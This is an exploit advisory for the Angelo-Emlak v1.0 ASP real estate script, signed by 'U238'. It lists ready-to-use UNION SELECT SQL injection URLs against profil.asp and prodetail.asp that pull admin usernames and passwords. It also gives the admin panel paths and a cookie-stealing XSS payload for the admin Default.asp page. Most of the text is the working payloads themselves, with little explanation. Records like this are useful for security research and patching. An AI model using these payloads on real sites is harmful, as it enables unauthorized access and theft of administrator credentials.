angeloemlak-multi.txt

`Angelo-Emlak v1.0 Multiple Remote SQL injection Vulnerable  
  
  
Discovered By : U238  
  
msn :setuid.noexec0x1[+]hotmail[-].com  
  
  
webPage :http://noexec.blogspot.com  
  
  
  
Script : http://www.aspdepo.org/tr/incele.asp?id=587&Script=angelo-emlak-v1.0-(tr)  
  
  
Script2 : http://rapidshare.de/files/39240819/angelo-emlak_v1.0.zip.html  
  
  
  
not : Siz0yyffyeniz biz kardesim inkar edenmı var ya :( - Allah .belanı versin ulan $iz0 .buda yılın sozu :D  
  
  
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_  
  
Exploit:  
  
  
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/profil.asp?id=1+union+select+0,1,2,3,(user),(pass),1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin+where+id=1  
  
  
----------  
  
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+user,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin  
  
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+pass,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin  
  
---------  
  
Admin Panel :   
  
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/default.asp  
  
X13 DB Editor Admin Panel :   
  
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/admin  
  
  
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_  
  
  
This script is xss vulnerable ! ..  
  
Exploit :   
  
  
target/angelo-emlak_v1.0/hpz/admin/Default.asp?sayfa=[XSS]  
  
"><script>alert(document.cookie)</script>&olay=insert  
  
  
----------------------------------------------------  
  
My Friends : ka0x - Marco Almeida - The_BekiR - fahn - Teyfik Cevik - Nettoxic - Caborz - Sersak - ZeberuS  
  
U238 | Web - Designer Solutions Developer  
  
  
`